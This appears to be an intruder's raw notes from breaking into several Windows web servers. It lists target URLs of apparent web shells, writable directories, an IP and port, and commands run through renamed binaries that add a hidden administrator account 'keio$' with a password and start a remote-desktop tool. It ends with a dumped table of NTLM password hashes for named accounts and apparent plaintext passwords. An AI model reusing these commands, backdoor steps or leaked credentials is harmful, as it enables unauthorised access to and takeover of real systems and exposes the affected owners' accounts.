http://www.zhiwu6.com//Tags\help.aspx


C:\\Documents and Settings\All Users\Documents\My Music\我的播放列表

C:\\Documents and Settings\All Users\Application Data\360safe\cmd.exe

/c E:\\360Downloads\net1.exe localgroup administrators

skflkejekf32ffd

121.14.142.76:9766

keio$ keio.asd

121.14.142.76:9766


http://www.bc278.com//Tags\help.aspx

C:\Program Files\\Symantec AntiVirus\SAVRT 可以读 可以写 可以删除


http://www.fj-yr.com///help.aspx

C:\\php5\PEAR

C:\\wmpub\

D:\\SafeDogUpdateCenter\log\fuck.exe

 C:\\Documents and Settings\All Users\Application Data

D:\qq

C:\\ADFS\\fuck.exe "net localgroup administrators keio$ /add"


/c C:\\ADFS\\fuck.exe "C:\\ADFS\\3389.exe"







http://www.cctv700.com//tags/help.aspx

E:\\Plugin\Com.Tencent.AudioVideo\net1.exe

/c E:\\Plugin\Com.Tencent.AudioVideo\fuck.exe "E:\\Plugin\Com.Tencent.AudioVideo\net1.exe  user keio$ keio.asd /add"


http://www.andthefor.com///help.aspx
keio$ keio

Administrator:500:0984DB06C2766F0E873DADF71449719F:BF38BB9B3DED01B825DE1DBD709B1B6C:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
SUPPORT_388945a0:1001:NO PASSWORD*********************:D639D65080053E68B2DC54ECA67E725D:::
ASPNET:1003:318957286C61526E83A7429FCA7F0095:BCEFFE73A3CBD997F707782058859625:::
IUSR_SHARK-27895:1004:5596079D6185898C5CDD52F598946079:9B76F587A66BE39DE4BBD6CEDFF3A895:::
IWAM_SHARK-27895:1005:F98C36F9562CC2FBD61F3FD7D0860465:4BC69E5A6CDCB6B6B6198C89E9BFE917:::
huweishen81528:1008:822610B08AEC4A6BAAD3B435B51404EE:1BBE922E5A8622B636DB85A080FB9A1E:::
www.8425111.com:1009:NO PASSWORD*********************:21AF8B5025D0A5010D1EC881ED0C17DD:::
www.yaochenmo.com:1010:NO PASSWORD*********************:DE74B6C08A0BA2A9E78E726FDF4D488F:::
www.ywshenmo.com:1011:NO PASSWORD*********************:8D06C08C6A8E8962DF677B2109CA1912:::
keio$:1012:6CB7C4BA6A842BB9AAD3B435B51404EE:024FAB62B5B9464DE463FB6E040AA13C:::

yc2012.,

root
slkdjf389sdjklkj

